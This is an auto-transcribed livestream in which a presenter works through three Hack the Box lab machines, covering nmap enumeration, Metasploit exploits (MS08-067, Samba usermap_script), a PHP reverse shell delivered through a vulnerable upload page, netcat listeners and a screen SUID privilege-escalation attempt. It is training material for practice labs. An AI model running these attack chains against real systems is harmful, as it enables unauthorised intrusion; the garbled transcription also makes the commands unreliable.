Alright guys, so we have a few coming and going. So I want to start by saying welcome and thank you. I mean, we don't have a lot of people here, but hopefully more join as time goes on. I've shared this quite a few places. Please, please, please share this on your stream, social media as well. If you know people that are interested in cybersecurity and offensive security especially. What we're going to be doing today is, a lot of people asked about enumeration and want to know about enumeration and things like that and kind of how you go about doing it. Now, mind you, I am not the most expert person at web enumeration. I have a lot to learn on that. More so, I prefer the network side of things. It makes it a little bit easier for me. But what I will do is show you kind of my methodology about how I go about looking at the initial vectors and things of that nature. And to be honest, we're even going to go over how to, the two boxes we're going to go over are actually really easy. So more than likely we'll end up doing both of those. So if you have any questions along the way, please feel free to ask. And don't hesitate to, you know, put your 2 cents in on what you may do differently. Normally in this process, I would use a tool called Auto Recon, which runs Nmap, GoBuster, a bunch of other tools depending on what ports are open. But what I'm going to show you today is going to be a lot of manual stuff for the sole purpose of I want you to understand what Auto Recon does and kind of the basic methodology behind enumeration and, you know, how to figure out what's going on a box. So without further ado, we're going to transition here. We're going to go to, so what you see here is my terminal. Please, if you cannot see my terminal right now, you should actually be able to see pretty well. I've enlarged the font so that it should be pretty easy. What I'm going to do here, if you have not used Hack the Box before or have not gained access, I am going to show you how to access the Hack the Box through their VPN from a distro that is not Kali. Because if you haven't watched any of my other videos, I am a fan of ParrotSec. I'm a fan of a bunch of Linux distributions, but ParrotSec right now is what I prefer to use. So that's what we're going to do. Alright, so the first thing to get in the Hack the Box, now mind you, you won't have to do this if you're a pen tester or if you're a red teamer. You won't have to take this step, but this is just for those new to the game that are trying to do things like virtual hacking labs or PWK or Hack the Box. You know, I believe virtual hacking labs uses a different VPN client, but regardless, this is a step you're gonna have to take for at least PWK and Hack the Box. So if you are on the newer Kali and you're not logged in as root, but you're logged in as the main, as Kali, I believe is the username. I don't use the newer distribution, so I wouldn't know. But for Parrot, I have my OpenVPN file for Hack the Box right in my home folder. Which, by the way, if you want to look me up on Hack the Box, if you have access, CyberSoldier18, you can find me. Or if you would like me to put the link to my profile, I can do that in the description later on. As well, I'll put some Discord links for some of the channels I'm a part of as well. But what we do here is we go and we connect. Alright, and now we're good to go. So what I like to do is I prefer tabbed terminals now that we're connected. That way I can kind of see where I'm at along the lines. So let me make this bigger for you guys. We're not going to get there yet, Darkom. What I'm going to show you here is going to be pretty basic. But eventually down the line, once we get into things like that, I'll show you. For now, I just want to show you some of the basic tools, and if you have questions along the way as we go through on what we're covering, feel free to ask then. But for now, we're going to stick to some of the more basic things. So the first thing you want to do, I'm going to go over a box called, like I said, it's, I believe the one we're going to do right now is Legacy. So Legacy has an IP address of 10.10.10.4. So what we're going to do to cover that is normally for a pen test, and actually I used to argue against this solely because it's very noisy. But seeing as how all companies are attacked every day, now that I've worked on a blue team, it's blatantly obvious that there are port scans going on like crazy. So they're not really alerted on too much. What we're going to do is we're going to do a simple Nmap scan. So I personally, you can save these to files. I don't normally do I don't normally do that myself. Auto Recon does it for me when I do it through there. But if you're taking notes or if you want to save it to a file, you can do that. But because the ones we're doing are pretty basic, we're just going to do it this way. I like to run a few switches. Oops. Alright. So SV is actually service version. And then we're also going to do, just type in here 4. And I forgot. Seam's down. So we got to do -pn. My bad. There we go. You know what? I know what I forgot to do. The box, I bet you, is not turned on. So to fix that, let me actually turn on the box. I tend to forget that sometimes these boxes are not, yeah, its time expired. So let me turn that box on real quick. Apologies. Mistakes happen. Alright, you can't get too mad at me for that. Let me cancel out of that. Clear this screen. Let me take a look at something. Go to scripting default. So SC does a default script scan, which kind of runs a few different variations of things. So let me make sure this box is now live. Alright. So we should be good to go. And let's try this again. Nmap with default script engine. We want service version. And we're just going to do it against 10.10.10.4. So, oh, come on. Apologies. I don't know why this doesn't want to work right now. I know it's live. I turned it on. Legacy 10.10.10.4. Reload. Make sure it's live. Why are you not up? There it is. Okay, it is up. Alright, so we're going to let that run. No ping. This may take a little bit. So, just to explain on the options, SC, once again, is the script scan. It runs default scripts against everything because Nmap has its built-in NSE scripting engine. -SV, and keep in mind, being Linux, everything is case sensitive. So the lowercase s capital V is service version, and the -capital P lowercase n means no ping. So it's not going to actually check to ping the host. It's just going to assume it's live and start running its scan. Now, when you run it like this, it actually does the top 1,000 ports, I believe it is. I could be mistaken on that number, but needless to say, it's done. So what we have here is 3 ports open: 139, 445, and 3389. Now we also see that it is running Windows XP. Mass scan works if you're doing a mass scan against a large network. It is extremely noisy, and it can do an entire subnet. Actually, I believe they say they can scan the entire internet in some ridiculous amount of time. but for the purposes of pen testing and things like that, Nmap is all you're ever going to need. Nothing against MapScan, but Nmap actually meets more of its purpose. So 3389, which is RDP, is closed, which is fine. We see two other ports open, one of which is 445, the other one is 139. So what this tells me is that SMB is actually open, and we're running Windows XP. So we go down here to SMB host discovery, and it tells us Windows XP, SMB security mode, and protocol negotiation failed for SMB 2. So it's only running SMB version 1, which is great, because SMB v1 is actually vulnerable to some interesting things. And the next thing we're going to do is we can run one more scan against this host, and what we're going to do is we're going to target that SMB port 445. So we're going to do nmap-a-v so we can get a verbose output, and -a will actually kick back. It'll run a lot of different switches and things like that. Now, if I'm right, which I'm hoping I am. Whoops, didn't want to do that. I forgot to put in one more thing. -p5. There we go. So now it'll only scan port. Oh man, I forgot PN. I keep forgetting that. Scanning one service, port 445, which is what we wanted. So what we're going to see here is probably similar information, but the -a actually runs a lot of default scripts. It does service version, and it runs a few other things as well. So that's what it's doing here. When you do a verbose output with that TAC-V, what you're seeing is it's running its script scanning. So we're going to let that go for a few seconds. Now, I already know, based on results, what's going to be vulnerable to this. And what I can do and what I will do for you is we're going to pull up a quick search. Let me see what I'm looking for. Here we go. Alright, so what we got here? Do we have a CVE? No, but we know we got SMB. Alright, and we're on Windows XP. Now, anybody who has done like CEH or any type of offensive security training in the most basic sense knows that there is a XP SMB vulnerability. So since I know SMB is vulnerable, especially on Windows XP, what we're going to do is we're going to pull up real quick list of security vulnerabilities based on Windows XP, and there is one in particular that I'm looking for, which should have come out. Why did it do that? I didn't want CVE details. I want to say it's called MSO8. 7. Oops, one extra character in there. So MSO8067 is a race condition in Windows XP, Windows 2000, Windows Server 03. Honestly, anything that's running Windows XP and SMB, it's one of the first things I always check. But we can see it here, and it is a critical vulnerability. So the beauty of this, and what I want to go into now, and what we're going to do here, if this works right, which it should, so we're going to do sudo postgres, oops, service postgresql start. Alright, and we're going to do MSF console. Now, I don't normally, well, I can't say I don't normally. I try to avoid Metasploit but it is beautiful for this purpose, and I'll show you why. Search MS08-067. Like I said, this is an easy box, but there is an SMB vulnerability based on Windows XP. Now you can do more searching on this. Like if you go into the bash here, Windows XP 2000 LAN server, I mean, you're given everything you need. SMB version 1, Windows XP. So a search of SMB vulnerabilities, Windows XP. You saw the CVE website I pulled open real quick. You can go through a slew of them. But once you start understanding how a lot of these machines work, the MSO8067 vulnerability is huge on Windows XP, and a lot of people, that's their go-to when they see this operating system. So what we're going to do is we're going to use exploit Windows SMB MS08067.API. Show options. All right, let me get my. Let's go here. What is my IP for this? We are at 10.10.14.12. So we're gonna do set lhost 10.12. We'll leave lport the same. We're gonna set our hosts 10.10.10.4. We're going to use 445. Browser is the SMB pipe. And, whoops, we're going to run, oops, one more thing. Show payloads. Set, I think I got to set the payload in this. So, you know what, we're going to try it without a payload and see what happens. We're just going to exploit it. So it'll detect the target, it finds it, XPSP3, and it automatically initializes an interpreter shell. So what we could do from here, and again, this is an easy box, just running Nmap, so it's not, you know, a lot of enumeration on this one. So if you guys want to stay online after we do our second one and feel like you want to get some more, we can go into that. But I'll drop into a shell. Who am I? Oops, no. ID. Shoot. See, I'm used to Linux. Don't you know? Alright, who remembers how to view who I am on here? Show username, Windows CMD. I tried who am I, does not work, so we're going to do echo, username. Let's try this one. There we go. Oh, no, that ain't what I want. So it basically says who I am. So yeah, it doesn't have it in there. Oh wait, net user. Apologies, this is not working for me, right? Oh, we could do that. We can do exits and do get UID. Forgot my interpreter commands work. Current working directory. And what do you know? We are NT Authority system, and in system 32 is the working directory. Now, like I said, this one is an extremely easy box. So it's that main Nmap enumeration is what I wanted to show you, because and we're going to go on, there's some more enumeration we can do, and we'll pick out some other boxes. I'll try to find a little bit of a harder one so we can go through some more steps. The next one we're going to do is a Linux box. It's called lame, so we'll end up doing that one also. What we're going to do is I'm going to keep this up because I want to get the I never did this one, so I'll claim it just so I could say I did it. New tab. So like I said, the next one we're going to do is lame. So we were already system on that box, so we're going to go into some more enumeration. So here's the thing about enumeration, and It's a process, it's a methodology, it's a mindset. So we're going to pick a different operating system, and we're going to use Linux, and we're going to see what Nmap brings back for us on that one. I got to stop this. So we're going to have to wait a few seconds for this to stop a retired machine. Unfortunately, Hack the Box does not let me start up 2 machines at once, so it's a little bit problematic. So hopefully this will stop here shortly. Oh crap, I forgot to do what I wanted. It hasn't stopped yet. Or did it? If it did, I'll get into it later. Alright, looks like it did. Alright, awesome. Alright, exits. Exits. Clear. Clear. So here's the downside about retired machines. You can only run one at a time. Well, you can run multiple, but only one user can have one on at a time. So if nobody else is logged into them, then you're kind of SOL. So 10.10.10.3 is this one. So lame is 10.10.10.3. Now, I'm going to run the initial scan, and what I want you guys to tell me is what you see, and we'll go from there. So we're going to do nmap -s. You know what, we'll do all -v 10.10.10.3, and let's see if this is going to yell. Alright, once again it yelled because of ping, so we're going to do that, let it scan. So it's going to try to scan all the ports, find them, and we're going to go from there. Yeah, top 1,000 ports anytime you do that. Hey, what do you know? So, where are we at? I'm going to step away for 1 second. If you have any questions, please put them here. In the meantime, when the scan is done, take a look at the results and have any questions when I get back. Alright, I'm back. So let's see what we see. So here we have, oops, just hit my desk. Alright, so we have a few things. We have VSFTPD, so we can do a quick search on that. And we see anonymous logon allowed, so we could attempt to log into there, which normally would be our first step. So we're probably going to go to that. But let's see what else we got here. So we have OpenSSH, and then we have 139 and 445. So we have another SMB session. But seeing as how .grlame. All right, seeing as how VSFTPD not in the FTP not only allows anonymous login, but I'm gonna bet that's an old version that has an exploit out there for it. So with that being said, let's first try to log in and see what we get. FTP 10.10.10.3 anonymous, enter, dir, binary, dir, passive dir, and there's no directory. So there's absolutely nothing in here. So that's kind of lame. So there's nothing in that directory. So the next thing we could do is we're going to go here and let's pull this terminal up again so I can get that version. So VSFTPD 2.3.4. Alright, so let's do exploitdb.com. And we're going to do a, let me enable JavaScript real quick on here. And we're going to do a search for VSFTPD 2.3.4. Alright, so there is a backdoor and it's built into Metasploit. So what we're going to do from there is we're going to do, we're going to leave that window up so I have those results. MSF console. And search VSFTPD. Hey, what do you know? There's a backdoor right there. So we're going to use exploit XFTP VS. Now, there's no guarantee this is going to work. I mean, it can work on that version, but if they put a patch out or if they did something, it could be blocked. So we're going to give it a shot, though. We're going to do show options. Set our host to 10.10.10.3 and exploit. And exploit failed. Alright, so what that means is for whatever reason, this particular setup of this box has denied access to that, that exploit, which is fine. So all that means is we move on and we look at something else. So the next thing we would look at, so we could look at SSH, which is possible, but we can also look at, see what else we got out there. So SSH, but then we got Samba sitting here. So like the last box, we know SMB and Samba and things like that have vulnerabilities as well. OpenSSH and SSH tend to have vulnerabilities, mainly with brute forcing and things like that. But I always like to make the assumption that I'm not going to attempt to brute force right away. If I see older versions of things out there, then that's what we're going to use. So I believe I installed, let's give it a shot. I think I installed it on here. If not, then nope. Alright, I didn't install it. So we're going to go back to exploitdb. And did I get rid of that window? There it is. Alright. And we're going to search for exploits. And we're going to look for Samba 3 dot. Alright. And we're going to pull back up this terminal window. And let's see what version we're at. 3.0 or 3.x, so we could try 3.0.2. What do we have? That's iOS 3.0.2. Let's see. So, whoops, not that one. Let's see. So there is a few vulnerabilities. So this one's Metasploit 3.0.2 less than .25. So let's take a look at this. Alright, so in Metasploit it would be called user map script. And it meets our version criteria. So if we look at the terminal again, 3.0.20 right there, Debian. So let's take a look at this one. and see what we get. So we're gonna do search user map. All right, so use exploit multi. Now the reason, so if you noticed in the last exploit, it said Unix, which works as Linux also, and then before that we had Windows. Usually right after that exploit where it says multi, it is the operating system or systems that it can work on. So multi just means numerous, and then you have Unix, which Unix works because of the back end of and where like Mac OS X and things like that started. Unix is still included, although I wouldn't necessarily. I would say that's more Linux in general, especially VSFTPD. But because it covers Mac and Linux, that's why it says Unix. Multi just means you can have Soundbot installed on countless other items. And if I'm wrong, please state it in the comments or in that little chat on the side. Let me know. But yes, that second directory is usually an operating system or systems of sort. So we're going to use this one, show options, set our hosts, 10.10.10.3, and exploit. Show payloads. I bet you it would help if I put a payload on here. So we want a payload. Let's do reverse TCP. Is that here? No, it's not. So let's try CMD Unix reverse. So, whoops. Set payload CMD Unix reverse. Show options. Does anybody remember what my IP was before I go digging for it? Let's go back here, 10.10.14.12. I should have known that. And exploit. Hey, we set a payload and we've got a shell. Who am I? And I'm already root. So it just so happens that this box in the service was running as root. So as soon as we gained access via this exploit, we had root. So let's keep going. If you guys want to. So do you want to get into something harder, or do you want to take a look at another easy one? We can kind of take a look at the what do you call it? The hack the box retired machines and take a look. We will not do the hardest one. Keep in mind this is about enumeration and methodology. So if you have a different methodology or if you have something you want to put in, feel free. I think we need to go a little deeper, so I think we may need a harder machine, which I'm all for, but that's up to you guys, unless you just have questions, because I can walk you through some more enumeration and methodology, you know, on my own, and we can just kind of see what things do. I can pick out a hard box, and we can go from there. so we can do that. All right, cool. What do you guys want to do? Because I'm tempted to do one more box. I feel we got a little bit of time. We could do a little bit more enumeration with something a little bit harder. Alright, grab a harder box. Alright, that way we can get a little bit more in. So, this box that I just... did I start this up? Let's see. So, we're going to go back. This one is called Haircut. So that you guys can take a look, and... It's kind of a funny name. But 10, 10, 10, 24. So, we're going to take a look at this one. Yeah, we want to abort. I already killed it, so clear. Let's open that up. Clear. Alright. So this one will get a little bit more entertaining. It's supposed to be a little bit harder, so hopefully it is. So let's do, let me find this IP again. Whoops, that ain't what I wanted. It's right here. I just saw you. Haircut. 10, 10, 10, 24. So, as always, we're going to do nmap-s. You know what? We'll just do -a. It'll run all scripts, OS detection, things like that. We're going to do verbose 10 of 10 of 10.24. Let's see what we get. So, we got 1, 2 open ports so far. So seeing that, normally I'd immediately go to the website, but let's see what we have here. So we have OpenSSH, a little bit newer version than what we saw previously, but we're still not going to go after that just yet. But we do see Nginx on port 80, and it's running a website. So first thing we're going to do is we're going to go here. We're going to do 10 of 10 of 10.24. Proxy server refusing connections for some reason. Interesting. So that's always fun. So what is actually, before I do that, before we go view, since proxy servers refusing connections, but we were able to scan it, let's have some fun. Let's take a look at... So, some people like GoBuster. Me personally, on the fly, I like to use dir with default wordless. So, we're just going to do dir 24, I believe... there. And what do you know? So we're going to start scanning it. So this is going to go through. It's going to use the default word list for derb. And you do this because you need to be able to see, a lot of times, any website you go to, there's a good percentage of the time that it has directories that are not directly linked in like a menu or a sitemap or something like that. Sometimes it'll be visible on a robots.txt file, which we could check right now. So while that's running, we can do /robots.txt. But seeing as how proxy servers refusing connections and we can't get to it, even though I have no proxy server running, we're gonna go through and let derb kind of do what it does. So while that's running, if you saw something like this, do you have any other tools, any other techniques that you would look at while doing this? So we got the index. So we know we can see that. So this is still running. I'm not finding anything yet. There's no admin pages. Now granted, I'm sure there's going to be something here because OpenSSH, like I said, unless there's a brute force, but even then you would need to know what username you're going to use. So we may have to change the word list because it does not look like it is finding what I want. Ooh, we've got an uploads directory. That's always a bonus. So while it finishes running through, let's see what else we get. Why, hello there, Cover 6 Solutions. Good to see you. Always supporting business to business support. I love it. Now, to be fair, I do know what this is supposed to find. I've looked at this one briefly before. It was just, I didn't feel like doing it. So, I do know what it's going to come across. So, while that's running, and it'll probably show up here shortly, we're going to go to... oh, my word list didn't find it. Completely forgot about that. But since we know that exists, so we're going to try uploads. Still getting denied. Expose.php. Why is my browser configured with a proxy server that it does not want to use? So, general. Where's network? Settings. Use system. Okay. Now let's try this again. No. Interesting. So there's no proxy, but yet it is not routing the way it needs to. Fun times. Damn it. Gotta love when things do not work out the way you want. For PSO uploads right up.php. No. So what it's supposed to do and what it is doing are two different things. Alright, well, I'm going to have to work on that. Needless to say, this is not finding what I need. So we're going to change the word list just so you guys can take a look and see what you're supposed to. So which word list is it? Where's... Alright, so let's use Dirtbuster. So we're going to come over here. And target URL HTTP 10.10.10.24 and auto switch 10 threads, browse. Which one? Where is Dirtbuster? So exits, locate Dirtbuster. User share Dirtbuster wordless. So we're gonna go here. User share. See. Dirtbuster, wordless, and lowercase medium. So your cursive. All right, and start. So that should work. Oh, I want to reset. I don't understand why it's saying I need a proxy server. I don't have a proxy. I shouldn't need to go through a proxy. But I have a feeling my traffic isn't being routed properly due to VPN for whatever reason. And no, I did not properly sacrifice to the demo gods, unfortunately. I should have. I knew I should have. But this is what happens when you do things live. Alright? Don't blame me. So, as we expected, there's the uploads directory that it found already. A heck of a lot quicker than Derb did. But problem is, I need to get to this website. So, as we're not necessarily attempting to crack all these boxes. See if this actually finds what it's supposed to. Because I know what it's supposed to find. I don't have many people left on here anyway, so I'm not really complaining. Who's all watching, by the way? So I see Robbie. I see Cover 6. Who else is on here right now? I've only got, well, my count just went down to 3 again. It keeps changing. I never know how many I got online. So I'm guessing as of right now, it is Robbie in Cover 6 Solutions. Because I am one of the 3 that is watching right now. So here's the problem. And guys, please, any ideas on why my network traffic isn't being routed properly right now? Nope. Everything's refusing. I don't have a proxy server, which is why this is blowing my mind. Nope. Chromium? Let's see if I have that. I do not have Chromium on here. So local, let's take a look. You know, you would think. DNS. Well, let's see. If I do a trace route. Oops. So that knows where to go. And considering DNS is dynamic name server, or your naming service, I'm not trying to go to a name. That shouldn't matter. And don't care about that. Don't care about that. So I could do that. No, not that one. Oh, that's -O. So let's try something. Seeing as how. Let's try this. Curl. P. Whoops. Let's pull a window up that you guys can actually see. That'd be nice. Curl. Let's see what we get when we do this. Loads. Expose.php. Not found. Bounce.jpg uploads. Moved permanently. That's pleasant. So curl works, but we are not getting what I should be, which is odd because this says expose.php. Expose.php. So maybe what... What about config proxy access and set to no proxy? So I did that. Settings. It was no proxy. Enable DNS. Okay. Actually, let's do this. Automatic. Auto detect. Okay. And then let's try to go here again. Nothing. Settings, settings, no proxy again. Nothing. So curl works. It's just the browser. Which means I'm gonna have to mess around my browser and see why it's not working. I have another way to do it, but I don't feel like redoing everything. Besides, I've only got 3 people watching right now. I don't know who the third is. Who's the third person watching? Alright, so if we want to do Chromium, so... bash sudo app install Chromium. Right, yeah. Like I said, I'm not in a VM. I'm using my daily driver, dude. So I'm going to try to install Chromium. I can try a private window, though. So, new private window. Nope. Someone just subscribed to me, which is awesome. The more the merrier. We're trying to find this problem. Got a little bit left. Got about a minute left till Chromium's finished downloading. Benefits of a crappy internet connection. But anyways, this is about enumeration. So we've done the Nmap twice now. This is still running through directories. So it is possible that I'm not finding the right directory. Although when we looked at the curl for the home page, there was a JPEG there, so I should have been able to get to it. So if this is a Firefox issue, we're going to find out once Chromium's done. Like I said, I do know what this is supposed to find. So let me do a quick search, file, new tab, cd user share, Doorbuster wordless, grep-r, exposed, lowercase medium. It's there, so it should find it. If this page still exists, if this box is still able to be compromised the right way, eventually it'll find what I need. Do I still have Doorbuster up, or did I quit? I quit. All right. IO exception connection reset. Well, that's not what you want. Interesting. There it is. Found it. So expose.php is still there. So we do know that the directories are there that I'm supposed to have. So we're going to quit that. Because that's what I was looking for, to make sure somebody didn't mess up the box. And considering I just started it up, it should be there. And if I go to uploads, expose.php, yeah. So now we're doing the Chromium install. And it's done. So let's start that up. Let's go here. Yeah, Honey Badger. 10.10.10.24. Hey, what do you know? This works. So we know we have an issue with Firefox. So that's why it's always good to have more than one browser. Hi, Brandon. And as we saw, we have an uploads directory, which is forbidden. But if we go to exposed, which we found, whoops, .php, so it doesn't autoload. Interesting. So now I'm getting 404 not found. Is it upload or uploads? Did we see that right? Uploads. Right here. Expose.php. So if we get rid of uploads, just do that. Alright, so uploads is not where to go. We go to expose.php. Enter the hairdresser's location you would like to check. So we did not go to check the source code. Well, we saw the source code of the main page. So the next thing we would do, since we know where this is at, is we can here and view page source. So we see an input. We really don't see what it is doing. Okay. But we see this fun little thing here. So let's say we wanted to check our own. One of the things we can do is we're going to go here. We're going to make dir pub, cd pub. And we're going to do... what type of file do we want to make for this? A PHP file. We're in PHP, so yeah, we're gonna do touch test.php, and then we're gonna do Python 3 -m htt. Crap, in a minute. 80? No, I did that wrong. I did it right, but sudo python 3 -m server 80. There we go. So we're serving a server, and it should be in that directory. So we want to do HTTP, and we're going to put in 10.10.14.12 slash test.php. Go. Hey, what do you know? So we see something there. So if we go back into this, we see that it connected back. All right. So what that tells us is it's doing either like a wget or a curl, something along those lines. So if that's the case, then what we should be able to do is initiate a reverse shell. All right. So if we do here, clear sc-lvnp43. Dang it. Sudo nc-lvnp3. Alright, so now we're listening. So the next thing we want is, let's see if we can get this to execute. Alright, so I'm going to pull back up this, and we're going to do one of my favorites, monkey. And we want a reverse shell from PHP. So shells, reverse shell, and PHP. Let's do a better Google search. PHP reverse shell. PHP reverse shell.php. Hey, what do you know? We have one right. Mirror. So we're gonna go here. I'm just gonna copy and paste this. So copy, and then we're gonna go back into this. That's netcat, so we don't need this anymore. And we know it's Ubuntu, so we know it's Linux, so we can use this quite easily because it has Linux commands in it, just so you're aware. And we're gonna do vi cd pub vi shell.php I Control Shift V, and then we're gonna go up. Alright, so if you recall, I set my port to 443. So 10.10.14.12 is my IP. 4.3 is the port. So we're gonna escape, right quit. Alright. And then we're gonna go back to Chromium. So since it does a curl, now just in case, we're also gonna have to output this. So we're gonna do 10.10.14.12/shell.php, and we're gonna test this just to see, since this is an uploads directory, we're gonna put it here, and we're gonna go, and let's see if it grabbed it. So we go back to our thing here, and we see a get. So now, since we have our listener, whoops, wrong one. We still have our listener here. So we're going to come back to that. Let me move it off the screen. I'll bring it back here in a second. And we want to do 10.10.10.24 uploads shell.php. And as you can see, we have a shell. Woohoo! So we have our initial shell. But as you can see by UID, and we are www data. So what does that mean? Well, it means we can't do a whole lot. Now again, because it's enumeration, and I did show you a few things. I show you derb, so I'm not going to get into enumerate. Well, you know what? It is enumeration, so let's enumerate this box. Let's see what we can do. So let's go, and what we want to do is we want to see which Python. I like Python. Locate Python. So we got. Did we lose our shell? We did. We lost our shell. So if we do that, since we lost it, let's just reload it. It happens. But we know we have Python 3. So with that being the case, whenever you get a shell like this, and you see can't access TTY, job control turned off, all that other stuff, means you don't have a real shell. So what we're going to do is we're going to do Python 3, since we know Python 3 is installed. And we're going to do -c import pty.spawn /bin. We want a bash shell. We're going to run that. Now we have a more legitimate shell. But still, it is not a valid shell. Alright, so we could do more if we wanted, but that's not what we want to do. If you wanted to use things like Control-C, clear, up, things like that, you would still need to upgrade your shell further. But being that I honestly don't have the patience for that, what we're going to do is we want to look for Linenum. And we're going to download this. So we want reboot user. We're just going to clone his entire... No, we just want this. Linenum code. Copy. And we're going to clone this real quick. And where we're going to clone it is into... So I don't need this anymore. Well, not right now. Sudo, or no, git clone here. And now we have that. ls. Alright, so we're going to move enum to here. And we're just going to call it enum.sh. Oops. Alright, and then we're going to go back up. Start my server back, and wget http 10.10.14.12/linenum.sh. We can't write to that directory. That's right. Yeah, tmp ls. All right, wget http 12 linenum.sh. Alright. And then we're going to do chmod +x linenum.sh back linenum.sh. Now, Linenum is a great tool. It'll give you a bunch of information about the system. And, you know, you can do a lot with it. So we're going to let this run through. Why'd that disappear on me? I want this. So this is going to give me all the information I need about the system at hand. And again, since this is about enumeration, why not? Let's take a look. Ooh, suid files. What do we got? Screen 4.5.0. Password, which is common. Launcher helper. So this screen stands out to me because screen 4.5.0 on a few other things I've done is vulnerable when the SUID bit is set, which means when this runs, it runs as root, all right, or with root permissions. So that's one thing. Let's see what else we got. Target. Locally on the attack place obtain. Alright. So since we see that, so we're gonna remember that, and we're gonna go back here to here, and we're gonna go back, and we're gonna do screen 4.5. I've had to exploit this in the past. That's why I always check suid bit's one of the first things I check, that and sudo-l. So here it is here. I think this is it. Should be right. Which is fun. So it ends up being a shell script that can't. So we may have to do some configuration with that, which is fine. But what we're going to do now is we're going to that. Let's go back to our directory. So we're going to go back to here. And if I'm not mistaken, this runs sudo-l. So let's see if we have any sudo permissions. Whoa. This one. Do we have sudo? So like I said, being that where I was at, SUID is one of the first things I look at, but I am not seeing any sudo permissions. No. Cron tab, cron jobs, passwords, environment. We know root's a super user account. Here's sudo. Maria, but we're not Maria. We're www data, and they have no sudo permissions. So we're gonna stick with screen. So the first thing we gotta do is go to here. So we want to download this. So what we can do is go and download. Okay. Alright, so we're downloaded. So now let's open up bash. Oops, not that one. Bash. CD downloads. Move 4.1 to pub 4.1.1. We're gonna do screen.sh. That's what we're gonna call it. So now if I come over here, kill this for now, clear, vi screen.sh. So what we see here in this screen is it's gonna cat. So we got echo, 2 echo commands. Then it's gonna cat till the end of the file, and it's gonna do all this. Then we're just gonna run gcc, remove that libhacks.c, cat till the end of file. So we're gonna attempt to see if this works for us. So quit. Where's my Python? So we're gonna come over here, and we're gonna do wget p 10.10.14.12 and screen.sh chmod plus x screen.sh /screen.sh. Bad interpreter, no file directory. So there's a way to fix that. So what was it again? Fix bad interpreter shell script. So next, let's see. Have a good one, Mark. So let's do DOS. Do I have this? To Unix. And we want to do shell. Alright. Now let's do this again. And rm screen. sh wget http 10.10.14.12 screen.sh chmod plus x screen.sh /screen.sh. Didn't work that time. Still getting bad interpreter. Interesting. Oh, wait. I think I found it. Ah, found the fix. Said I-E-S. So, good old Professor Google found this. I always forget this fix. Here. Show.sh. Oh, screen.sh. My bad. Said -I-E-S. R. $. Alright. /screen.sh. Let's see. Cannot preload, so looks like probably a GCC issue. So let's see what we are messing up on. Alright, so anywho, I don't feel like going through and recompiling all this. So GCC is broken on this machine. So you'll have to go through, we would have to go through and compile the libhacks.so and root shell. So if we look at cat screen, where are we at? So this GCC root shell, which is what becomes of this little stance. And then this libhacks.so is, where you at? Right here. So this file right here is libhacks.c, which ends up becoming libhacks.so. So you would have to make those two files, move them over to the machine, since that's where it breaks, and then run that same shell script. I've been running for a while, out of time, and no, I'm not going to edit this video, so if you've watched this long, congratulations. I highly doubt anybody else is going to watch it, but hopefully you guys come back. And if you would like to see more, you know, if you want to go over something harder, it'd be great to have you. So other than that, you guys have a great night. You take care, because I am not going to go through and finish this box. But yes, I do know what's wrong. I do know. So Security School and Christian Rios, good to have you. You're just jumping on now, but it's getting late. I got to roll. Like I said, I do know it's broke. There's the two things that I need to fix because of where it broke in here. So you can see that it did the first few parts, but then it got broken. So the root shell and libhacks.so need done. So you can compile those on your own, and move those over to your system and go ahead and run the script again. But other than that, look, please, I am going to actually leave this video and post it to my channel. So it will not go away. It's permanent. I really don't care what people think. The video is permanent. All my videos are permanent. If you didn't watch my live stream from yesterday, the day before, feel free to watch that one also. And watch anything else that I have. I have a few on ParrotSec that'll give you a little rundown on like auto recall and what I talked about with that, and a few others. But other than that, you guys have a great night. I don't know if I'm going to be on tomorrow, but enjoy your 4th of July weekend. Enjoy your Independence Day. Have fun. Have a few drinks, or you know, a cookout, a barbecue, whatever you plan on doing, and stay safe. Have a good one. Later.